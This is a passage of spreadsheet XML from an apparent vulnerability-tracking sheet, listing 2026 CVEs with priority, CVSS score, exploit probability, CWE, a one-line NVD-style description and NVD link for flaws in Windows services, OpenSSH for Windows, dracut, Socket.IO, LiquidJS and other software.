      <c r="E2707" s="5" t="inlineStr"/>
      <c r="F2707" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2707" s="5" t="inlineStr"/>
      <c r="H2707" s="5" t="inlineStr"/>
      <c r="I2707" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2707" s="5" t="inlineStr"/>
      <c r="K2707" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2707" s="5" t="inlineStr">
        <is>
          <t>S2OPC 1.7.3 contains an out-of-bounds read in RepublishResponse handling. This allows a remote attacker to cause a denial of service</t>
        </is>
      </c>
      <c r="M2707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67865</t>
        </is>
      </c>
    </row>
    <row r="2708">
      <c r="A2708" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67918</t>
        </is>
      </c>
      <c r="C2708" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2708" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2708" s="5" t="inlineStr"/>
      <c r="F2708" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G2708" s="5" t="inlineStr"/>
      <c r="H2708" s="5" t="inlineStr"/>
      <c r="I2708" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2708" s="5" t="inlineStr"/>
      <c r="K2708" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2708" s="5" t="inlineStr">
        <is>
          <t>Directory Traversal vulnerability in hermes-studio v.0.6.26 allows a remote attacker to obtain sensitive information via the validatePath function in api/hermes/download endpoint</t>
        </is>
      </c>
      <c r="M2708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67918</t>
        </is>
      </c>
    </row>
    <row r="2709">
      <c r="A2709" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67977</t>
        </is>
      </c>
      <c r="C2709" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2709" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2709" s="5" t="inlineStr"/>
      <c r="F2709" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2709" s="5" t="inlineStr"/>
      <c r="H2709" s="5" t="inlineStr"/>
      <c r="I2709" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J2709" s="5" t="inlineStr"/>
      <c r="K2709" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2709" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the Svc::FileDownlink::SendPartial component of fprime framework v4.2.2 allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="M2709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67977</t>
        </is>
      </c>
    </row>
    <row r="2710">
      <c r="A2710" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67991</t>
        </is>
      </c>
      <c r="C2710" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2710" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2710" s="5" t="inlineStr"/>
      <c r="F2710" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2710" s="5" t="inlineStr"/>
      <c r="H2710" s="5" t="inlineStr"/>
      <c r="I2710" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2710" s="5" t="inlineStr"/>
      <c r="K2710" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L2710" s="5" t="inlineStr">
        <is>
          <t>crmne/ruby_llm at commit fa6f279847d6d7027814539d9c0dfc3bbdfd2a83 contains a polynomial-time regular expression denial-of-service condition in RubyLLM::Utils.underscore on Ruby 3.1.x. A very long crafted class, agent, or tool name can cause excessive CPU consumption and a denial of service.</t>
        </is>
      </c>
      <c r="M2710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67991</t>
        </is>
      </c>
    </row>
    <row r="2711">
      <c r="A2711" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68005</t>
        </is>
      </c>
      <c r="C2711" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2711" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2711" s="5" t="inlineStr"/>
      <c r="F2711" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2711" s="5" t="inlineStr"/>
      <c r="H2711" s="5" t="inlineStr"/>
      <c r="I2711" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2711" s="5" t="inlineStr"/>
      <c r="K2711" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2711" s="5" t="inlineStr">
        <is>
          <t>An issue in ACME mini_httpd 1.30 and prior allows a remote attacker to cause a denial of service via the HTTP request header parser in the handle_request() function</t>
        </is>
      </c>
      <c r="M2711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68005</t>
        </is>
      </c>
    </row>
    <row r="2712">
      <c r="A2712" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68500</t>
        </is>
      </c>
      <c r="C2712" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2712" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2712" s="5" t="inlineStr"/>
      <c r="F2712" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2712" s="5" t="inlineStr"/>
      <c r="H2712" s="5" t="inlineStr"/>
      <c r="I2712" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J2712" s="5" t="inlineStr"/>
      <c r="K2712" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2712" s="5" t="inlineStr">
        <is>
          <t>Sylius Mollie Plugin provides Mollie payment integration for Sylius applications. Prior to 2.2.8, 3.2.4, and 3.3.1, Sylius Mollie Plugin's POST /{_locale}/update-payment payment webhook accepts attacker-controlled id and orderId parameters but does not verify that the Mollie payment belongs to the referenced Sylius order, allowing an unauthenticated attacker with any valid paid Mollie payment ID to mark a victim order as paid without transferring funds for that order. This issue is fixed in 2.2.8, 3.2.4, and 3.3.1.</t>
        </is>
      </c>
      <c r="M2712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68500</t>
        </is>
      </c>
    </row>
    <row r="2713">
      <c r="A2713" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6857</t>
        </is>
      </c>
      <c r="C2713" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2713" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2713" s="5" t="inlineStr"/>
      <c r="F2713" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2713" s="5" t="inlineStr"/>
      <c r="H2713" s="5" t="inlineStr"/>
      <c r="I2713" s="5" t="inlineStr">
        <is>
          <t>2026-04-22</t>
        </is>
      </c>
      <c r="J2713" s="5" t="inlineStr"/>
      <c r="K2713" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L2713" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in camel-infinispan. This vulnerability involves unsafe deserialization in the ProtoStream remote aggregation repository. A remote attacker with low privileges could exploit this by sending specially crafted data, leading to arbitrary code execution. This allows the attacker to gain full control over the affected system, impacting its confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="M2713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6857</t>
        </is>
      </c>
    </row>
    <row r="2714">
      <c r="A2714" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68887</t>
        </is>
      </c>
      <c r="C2714" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2714" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2714" s="5" t="inlineStr"/>
      <c r="F2714" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2714" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2714" s="5" t="inlineStr"/>
      <c r="I2714" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2714" s="5" t="inlineStr"/>
      <c r="K2714" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2714" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Message Queuing Queue Manager allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68887</t>
        </is>
      </c>
    </row>
    <row r="2715">
      <c r="A2715" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6893</t>
        </is>
      </c>
      <c r="C2715" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2715" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2715" s="5" t="inlineStr"/>
      <c r="F2715" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G2715" s="5" t="inlineStr"/>
      <c r="H2715" s="5" t="inlineStr"/>
      <c r="I2715" s="5" t="inlineStr">
        <is>
          <t>2026-06-10</t>
        </is>
      </c>
      <c r="J2715" s="5" t="inlineStr"/>
      <c r="K2715" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2715" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in dracut. A remote attacker on the adjacent network can exploit this vulnerability by providing specially crafted DHCP (Dynamic Host Configuration Protocol) options, such as a malicious hostname, to a system using dracut's legacy DHCP path. These options are improperly handled and written into temporary shell scripts without proper escaping, leading to command injection. This allows the attacker to achieve root code execution within the initramfs, potentially compromising the system's boot and network behavior.</t>
        </is>
      </c>
      <c r="M2715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6893</t>
        </is>
      </c>
    </row>
    <row r="2716">
      <c r="A2716" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69185</t>
        </is>
      </c>
      <c r="C2716" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2716" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2716" s="5" t="inlineStr"/>
      <c r="F2716" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2716" s="5" t="inlineStr"/>
      <c r="H2716" s="5" t="inlineStr"/>
      <c r="I2716" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J2716" s="5" t="inlineStr"/>
      <c r="K2716" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-754</t>
        </is>
      </c>
      <c r="L2716" s="5" t="inlineStr">
        <is>
          <t>Socket.IO enables bidirectional and low-latency communication for every platform. Prior to 4.2.7, 3.4.5, and 3.3.6, a specially crafted Socket.IO packet can make the server wait for a large number of binary attachments and buffer them, which can be exploited to make the server run out of memory. This vulnerability is fixed in 4.2.7, 3.4.5, and 3.3.6.</t>
        </is>
      </c>
      <c r="M2716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69185</t>
        </is>
      </c>
    </row>
    <row r="2717">
      <c r="A2717" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69222</t>
        </is>
      </c>
      <c r="C2717" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2717" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2717" s="5" t="inlineStr"/>
      <c r="F2717" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2717" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2717" s="5" t="inlineStr"/>
      <c r="I2717" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2717" s="5" t="inlineStr"/>
      <c r="K2717" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2717" s="5" t="inlineStr">
        <is>
          <t>LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to 10.27.2, the join filter in src/filters/array.ts computes complexity from array.length and separator length instead of the total string length produced by array.join(sep). The concat filter can cheaply double arrays of references, after which join materializes the referenced content while charging only for element count, allowing a template to exceed a configured memoryLimit by a large factor. The sibling array_to_sentence_string filter in src/filters/string.ts has the same accounting defect, and a crafted template can allocate toward V8's string or process memory limit and crash the process. This issue is fixed in version 10.27.2.</t>
        </is>
      </c>
      <c r="M2717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69222</t>
        </is>
      </c>
    </row>
    <row r="2718">
      <c r="A2718" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69329</t>
        </is>
      </c>
      <c r="C2718" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2718" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2718" s="5" t="inlineStr"/>
      <c r="F2718" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2718" s="5" t="inlineStr"/>
      <c r="H2718" s="5" t="inlineStr"/>
      <c r="I2718" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2718" s="5" t="inlineStr"/>
      <c r="K2718" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-190</t>
        </is>
      </c>
      <c r="L2718" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in BranchCache allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69329</t>
        </is>
      </c>
    </row>
    <row r="2719">
      <c r="A2719" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69342</t>
        </is>
      </c>
      <c r="C2719" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2719" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2719" s="5" t="inlineStr"/>
      <c r="F2719" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2719" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2719" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2719" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2719" s="5" t="inlineStr"/>
      <c r="K2719" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2719" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69342</t>
        </is>
      </c>
    </row>
    <row r="2720">
      <c r="A2720" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69378</t>
        </is>
      </c>
      <c r="C2720" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2720" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2720" s="5" t="inlineStr"/>
      <c r="F2720" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2720" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2720" s="5" t="inlineStr"/>
      <c r="I2720" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2720" s="5" t="inlineStr"/>
      <c r="K2720" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L2720" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled recursion in Microsoft Exchange Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69378</t>
        </is>
      </c>
    </row>
    <row r="2721">
      <c r="A2721" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69397</t>
        </is>
      </c>
      <c r="C2721" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2721" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2721" s="5" t="inlineStr"/>
      <c r="F2721" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2721" s="5" t="inlineStr">
        <is>
          <t>windows, openssh</t>
        </is>
      </c>
      <c r="H2721" s="5" t="inlineStr"/>
      <c r="I2721" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2721" s="5" t="inlineStr"/>
      <c r="K2721" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2721" s="5" t="inlineStr">
        <is>
          <t>Use after free in OpenSSH for Windows allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69397</t>
        </is>
      </c>
    </row>
    <row r="2722">
      <c r="A2722" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69428</t>
        </is>
      </c>
      <c r="C2722" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2722" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2722" s="5" t="inlineStr"/>
      <c r="F2722" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2722" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2722" s="5" t="inlineStr"/>
      <c r="I2722" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2722" s="5" t="inlineStr"/>
      <c r="K2722" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2722" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69428</t>
        </is>
      </c>
    </row>
    <row r="2723">
      <c r="A2723" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69429</t>
        </is>
      </c>
      <c r="C2723" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2723" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2723" s="5" t="inlineStr"/>
      <c r="F2723" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2723" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2723" s="5" t="inlineStr"/>
      <c r="I2723" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2723" s="5" t="inlineStr"/>
      <c r="K2723" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2723" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows IKE Extension allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69429</t>
        </is>
      </c>
    </row>
    <row r="2724">
      <c r="A2724" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69443</t>
        </is>
      </c>
      <c r="C2724" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2724" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2724" s="5" t="inlineStr"/>
      <c r="F2724" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G2724" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2724" s="5" t="inlineStr"/>
      <c r="I2724" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2724" s="5" t="inlineStr"/>
      <c r="K2724" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2724" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Device Health Attestation (DHA) allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69443</t>
        </is>
      </c>
    </row>
    <row r="2725">
      <c r="A2725" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69514</t>
        </is>
      </c>
      <c r="C2725" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2725" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2725" s="5" t="inlineStr"/>
      <c r="F2725" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2725" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2725" s="5" t="inlineStr"/>
      <c r="I2725" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2725" s="5" t="inlineStr"/>
      <c r="K2725" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2725" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69514</t>
        </is>
      </c>
    </row>
    <row r="2726">
      <c r="A2726" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69539</t>
        </is>
      </c>
      <c r="C2726" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2726" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2726" s="5" t="inlineStr"/>
      <c r="F2726" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2726" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2726" s="5" t="inlineStr"/>
      <c r="I2726" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2726" s="5" t="inlineStr"/>
      <c r="K2726" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2726" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69539</t>
        </is>
      </c>
    </row>
    <row r="2727">
      <c r="A2727" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69587</t>
        </is>
      </c>
      <c r="C2727" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2727" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2727" s="5" t="inlineStr"/>
      <c r="F2727" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2727" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2727" s="5" t="inlineStr"/>
      <c r="I2727" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2727" s="5" t="inlineStr"/>
      <c r="K2727" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2727" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69587</t>
        </is>
      </c>
    </row>
    <row r="2728">
      <c r="A2728" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69588</t>
        </is>
      </c>
      <c r="C2728" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2728" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2728" s="5" t="inlineStr"/>
      <c r="F2728" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2728" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2728" s="5" t="inlineStr"/>
      <c r="I2728" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2728" s="5" t="inlineStr"/>
      <c r="K2728" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L2728" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows TCP/IP allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69588</t>
        </is>
      </c>
    </row>
    <row r="2729">
      <c r="A2729" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69599</t>
        </is>
      </c>
      <c r="C2729" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2729" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2729" s="5" t="inlineStr"/>
      <c r="F2729" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2729" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2729" s="5" t="inlineStr"/>
      <c r="I2729" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2729" s="5" t="inlineStr"/>
      <c r="K2729" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2729" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69599</t>
        </is>
      </c>
    </row>
    <row r="2730">
      <c r="A2730" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69607</t>
        </is>
      </c>
      <c r="C2730" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2730" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2730" s="5" t="inlineStr"/>
      <c r="F2730" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2730" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2730" s="5" t="inlineStr"/>
